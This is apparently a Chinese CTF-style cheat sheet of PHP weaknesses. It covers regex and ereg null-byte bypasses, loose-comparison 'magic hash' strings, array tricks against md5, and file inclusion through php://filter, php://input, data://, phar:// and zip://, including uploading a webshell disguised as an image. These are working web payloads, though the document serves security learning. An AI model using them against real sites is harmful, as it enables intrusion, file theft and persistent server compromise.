PHP函數漏洞集

正則表達式

preg_match
如果在進行正則表達式匹配的時候，沒有限制字符串的開始和結束(^ 和 $)，則可以存在繞過的問題

$ip = '1.1.1.1 abcd'; // 可以繞過
if(!preg_match("/(\d+)\.(\d+)\.(\d+)\.(\d+)/",$ip)) {
  die('error');
} else {
  // echo('key...')
}

ereg %00 截斷
ereg 讀到 %00 的時候，就截止了

<?php
    if (ereg ("^[a-zA-Z]+$", $_GET['a']) === FALSE)  {
        echo 'You password must be alphabet';
    }
?>

a=abcd%001234，可以繞過
ereg ("^[a-zA-Z0-9]+$", $_GET['password']) === FALSE
字符串對比解析
在這裏如果 $_GET[‘password’]爲數組，則返回值爲NULL
如果爲123 || asd || 12as || 123%00&&&**，則返回值爲true
其餘爲false

字符串比較

<?php  
    echo 0 == 'a' ;// a 轉換爲數字爲 0    重點注意
    // 0x 開頭會被當成16進制54975581388的16進製爲 0xccccccccc
    // 十六進制與整數，被轉換爲同一進制比較
    '0xccccccccc' == '54975581388' ;

    // 字符串在與數字比較前會自動轉換爲數字，如果不能轉換爲數字會變成0
    1 == '1';
    1 == '01';
    10 == '1e1';
    '100' == '1e2' ;    

    // 十六進制數與帶空格十六進制數，被轉換爲十六進制整數
    '0xABCdef'  == '     0xABCdef';
    echo '0010e2' == '1e3';
    // 0e 開頭會被當成數字，又是等於 0*10^xxx=0
    // 如果 md5 是以 0e 開頭，在做比較的時候，可以用這種方法繞過
    '0e509367213418206700842008763514' == '0e481036490867661113260034900752';
    '0e481036490867661113260034900752' == '0' ;

    var_dump(md5('240610708') == md5('QNKCDZO'));
    var_dump(md5('aabg7XSs') == md5('aabC9RqS'));
    var_dump(sha1('aaroZmOk') == sha1('aaK1STfY'));
    var_dump(sha1('aaO8zKZF') == sha1('aa3OFF9m'));
?>

文件包含

http://127.0.0.1/index.php?page=upload
這種 url 很容易就能想到可能是文件包含或者僞協議讀取
http://127.0.0.1/index.php?page=php://filter/read=convert.base64-encode/resource=upload

僞協議

php://filter

讀取文件

index.php?file=php://filter/convert.base64-encode/resource=flag.php
index.php?file=php://filter/read=convert.base64-encode/resource=flag.php

php://input

寫入文件，數據利用 POST 傳過去

index.php?file=php://input

data://

將 include 的文件流重定向到用戶控制的輸入流
test.php?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpO2V4aXQoKTsvLw==
可以用於控制 file_get_contents 的內容爲用戶輸入的流

$file=$_GET['file'];
$data = @file_get_contents($a,'r');
echo $data;

phar://

發現有一個文件上傳功能，無法繞過，僅能上傳jpg後綴的文件。與此同時，無法進行文件包含截斷。allow_url_include=on 的狀態下，就可以考慮phar僞協議繞過。
寫一個shell.php文件，裏面包含一句話木馬。然後，壓縮成xxx.zip。然後改名爲xxx.jpg進行上傳。最後使用phar進行包含
這裏的路徑爲上傳的 jpg 文件在服務器的路徑
/index.php?id=phar://路徑/xxx.jpg/shell

zip://

上述 phar:// 的方法也可以使用 zip://
然後吧1.php文件壓縮成zip，再把zip的後綴改爲png，上傳上去，並且可以獲得上傳上去的png的地址。
1.zip文件內僅有1.php這個文件

/php?file=zip://1.png%231.php  
// 也可以嘗試不改名爲png，直接使用zip上傳測試一下
/php?file=zip://1.zip%231.php

MD5 compare漏洞

PHP在處理哈希字符串時，如果利用”!=”或”==”來對哈希值進行比較，它把每一個以”0x”開頭的哈希值都解釋爲科學計數法0的多少次方（爲0），所以如果兩個不同的密碼經過哈希以後，其哈希值都是以”0e”開頭的，那麼php將會認爲他們相同。
常見的payload有

0x01 md5(str)
    QNKCDZO
    240610708
    s878926199a
    s155964671a
    s214587387a
    s214587387a
0x02 sha1(str)
    sha1('aaroZmOk')  
    sha1('aaK1STfY')
    sha1('aaO8zKZF')
    sha1('aa3OFF9m')

同時MD5不能處理數組，若有以下判斷則可用數組繞過

if(@md5($_GET['a']) == @md5($_GET['b']))
{
    echo "yes";
}
//http://127.0.0.1/1.php?a[]=1&b[]=2

變量覆蓋

PHP函數漏洞集

正則表達式

字符串比較

文件包含

僞協議

php://filter

php://input

data://

phar://

zip://

MD5 compare漏洞

PHP函數漏洞集

Mac下配置sublime實現LaTeX

https://yachay.unat.edu.pe/blog/index.php?comment_area=format_blog&comment_component=blog&comment_co

linux以太網驅動總結